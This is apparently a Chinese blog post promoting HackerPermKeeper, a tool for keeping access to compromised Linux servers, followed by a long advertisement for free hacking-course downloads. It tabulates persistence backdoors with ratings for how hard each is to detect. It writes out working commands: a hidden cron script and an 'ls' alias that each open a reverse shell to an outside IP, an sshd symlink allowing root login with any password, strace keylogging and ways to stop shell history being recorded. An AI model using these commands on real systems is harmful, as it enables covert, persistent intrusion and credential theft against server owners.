通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper[黑客权限保持者]
🚀上手指南
📢 有助于你快速熟悉HackerPermKeeper
🔒支持系统列表
🔒权限维持模块 | centos | Ubuntu | 推荐指数 | 需要权限 | 备注 | py2 | py3 |
---|---|---|---|---|---|---|---|
OpenSSH后门万能密码&记录密码 | ❌ | ✔️ | ⭐ | root | 此后门需要很老的内核版本,而且需要很多依赖环境 | ❌ | ✔️ |
PAM后门 | ❌ | ❌ | ⭐ | ❌ | 此后门需要很老的内核版本,而且需要很多依赖环境 | ❌ | ❌ |
ssh软链接 | ✔️ | ✔️ | ⭐ ⭐ | root | 容易被发现 | ✔️ | ✔️ |
ssh公私密钥 | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐ ⭐ | User | 发现程度很难,参考了挖矿病毒 | ✔️ | ✔️ |
后门帐号 | ✔️ | ✔️ | ⭐ ⭐ ⭐ | root | 用命令添加账户,不会创建用户home目录[有一个是直接指向root目录] | ✔️ | ✔️ |
crontab计划任务 | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐ | User or root | 难以发现,通过执行计划任务 | ✔️ | ✔️ |
Strace后门 | ✔️ | ✔️ | ⭐ ⭐ | root | 键盘记录的后门 | ✔️ | ✔️ |
Alias后门 | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐ | root | 别名后门,难以发现,但是需要用户去执行命令 | ✔️ | ✔️ |
Rootkit后门[检测] | ❌ | ❌ | ⭐ ⭐ ⭐ | root | 难以发现,但是安装复杂,而且指定内核版本 | ❌ | ❌ |
临时history不记录命令 or 永久不记录命令 | ✔️ | ✔️ | ⭐ ⭐ ⭐⭐⭐⭐ | root | 有的服务器设置了空格记录执行命令,执行这个脚本快速设置不记录空格命令 | ✔️ | ✔️ |
ssh软链接&crontab | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐ | root | 快速生成软链接,并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行 | ✔️ | ✔️ |
check.py | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐⭐⭐ | User | 快速检测目标机器可以使用那个权限维持模块,并且检测当前机器处于docker还是k8s,并检测docker逃逸 | ✔️ | ✔️ |
sshkey密钥&crontab | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐⭐ ⭐ | User or root | 快速生成ssh密钥,并且执行计划任务,每分钟判断当前密钥和多个文件是否存在,如果被kill掉,就重新执行 | ✔️ | ✔️ |
php权限维持不死免杀马 | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐⭐ ⭐ | User or root | phpweb权限维持马 | ✔️ | ✔️ |
Suid shell bash | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐ ⭐ | root | Suid shell bash脚本(低权限用户运行),可以和webshell进行联动一个低权限用户只需要执行一个文件就可以获取高权限 | ✔️ | ✔️ |
BT面板后渗透[bt_T00ls_v7.0]内部版 | ✔️ | ✔️ | ⭐ ⭐ ⭐ ⭐ ⭐ | root | BT面板后渗透【bt_T00ls_v7.0】内部版 | ✔️ | ✔️ |
🔐权限的划分
UID | 数值 | 比如: |
---|---|---|
0 | 超级管理员(root用户) | root |
1~999 | Linux系统将一些服务程序和系统任务分配给独立的系统用户来运行 | bin |
1000 | 普通用户UID从1000开始 | www-data,www |
🐍安装要求
python3运行此项目[我自己的环境是Python 3.9.7],但是运行权限维持模块脚本请看上面的表格``安装依赖``pip install -r requirements.txt
测试是否正常运行
python main.py -h
✨使用演示
python main.py -h
快速判断目标机器适合的权限维持模块,运行 /check/ 目录下的check.py文件[这个不需要任何依赖环境,python3和python2都支持]``python check.py``python3 check.py``python2 check.py
查看权限维持模块信息
python main.py -c 1
查看权限维持模详细块信息
python main.py -c 2
使用此项目生成权限维持脚本[在这之前,请先运行check.py脚本判断出目标机器适合什么类型权限维持的脚本]
python main.py -m 1 #选择模块[6.0更新之后,可以连续选择]
有的生成的脚本文件。需要在生成之后进行手动修改``比如:修改反弹shellip以及端口,后门用户密码,ssh密钥密码,ssh密钥等[此缺陷将会在第二个版本修复]``生成的文件会在payloads目录下产生
🚩 常见后门介绍
OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用发现程度:||
PAM后门,PAM是一个Linux登录验证的认证服务,修改其中关于ssh登录的验证,添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼)
发现程度:||
SSH软链接cat /etc/ssh/sshd_config|grep UsePAM
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888ssh root@xx.xx.xx.xx -p 8888 任意密码登录即可
发现程度:||||||
公私钥使用密钥进行登录
发现程度:||||||
后门帐号使用命令添加账号
发现程度:||||||
crontab后计划任务1、编辑后门反弹
vim /etc/.111.sh
#!/bin/bashsh -i >& /dev/tcp/192.168.86.137/3434 0>&1
chmod +x /etc/.111.sh
2、添加定时任务
vim /etc/crontab*/1 * * * * root /etc/.1111.sh
发现程度:||||||
Strace后门strace是一个动态跟踪工具,它可以跟踪系统调用的执行。
我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围可以记录ssh明文和密钥(登录的)和Rootkit配合一起
发现程度:||||
命令自定义-Alias后门alias命令的功能:为命令设置别名
alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts’执行ls就会反弹shell
持久化+隐藏:重启依旧生效发现程度:||||
Rootkit后门
https://github.com/f0rb1dd3n/Reptile/releases/Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。
发现程度:||但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大)
history不记录执行命令
在输入命令时候,添加空格
ssh软链接&crontab快速生成软链接[需要运行脚本成功后,一分钟连接],并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行
||||| 越多,越容易发发现
|| 越少,越难发现,但是部署起来,需要的依赖很多
## 最后
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以[**点击免费领取**](https://mp.weixin.qq.com/s/X5lyKM7OxZbMAnkCCH68IA)(如遇扫码问题,可以在评论区留言领取哦)~
😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓
[**CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享**](https://mp.weixin.qq.com/s/X5lyKM7OxZbMAnkCCH68IA)
<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704434077277.png?t=0.4787928266093231" style="margin: auto" />
## 1️⃣零基础入门
## ① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。
![](https://img-blog.csdnimg.cn/img_convert/e6f8d3366d10741160e07555f4de353d.gif)
## ② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
![](https://img-blog.csdnimg.cn/img_convert/b29bdfbbe3b2bcc69fd39d09e76f6052.png)
**因篇幅有限,仅展示部分资料**
## 2️⃣视频配套资料&国内外网安书籍、文档
## ① 文档和书籍资料
![](https://img-blog.csdnimg.cn/img_convert/b6d1fb445fdab41ab73ee49b96b5aab4.gif)
## ② 黑客技术
![](https://img-blog.csdnimg.cn/img_convert/f1002bb3e752a47c1845fbc4a8817110.gif)
![](https://img-blog.csdnimg.cn/img_convert/f3eab792d85c889fc264581628de4caf.jpeg)
**因篇幅有限,仅展示部分资料**
[**CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享**](https://mp.weixin.qq.com/s/X5lyKM7OxZbMAnkCCH68IA)
<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704434077277.png?t=0.4787928266093231" style="margin: auto" />
## 3️⃣网络安全源码合集+工具包
![](https://img-blog.csdnimg.cn/img_convert/da3db04524d02663b58f7e85e0ea7506.gif)
## 4️⃣网络安全面试题
![](https://img-blog.csdnimg.cn/img_convert/7807bf23cdde97aef761fa54121e6fe7.gif)
## 5️⃣汇总
![](https://img-blog.csdnimg.cn/img_convert/e809ad2fafed5cf4b4f3e7afa75bf5c9.gif)
![](https://img-blog.csdnimg.cn/img_convert/e62f68122966aea5357771b0029477dd.gif)
[**CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享**](https://mp.weixin.qq.com/s/X5lyKM7OxZbMAnkCCH68IA)
<img src="https://hnxx.oss-cn-shanghai.aliyuncs.com/official/1704434077277.png?t=0.4787928266093231" style="margin: auto" />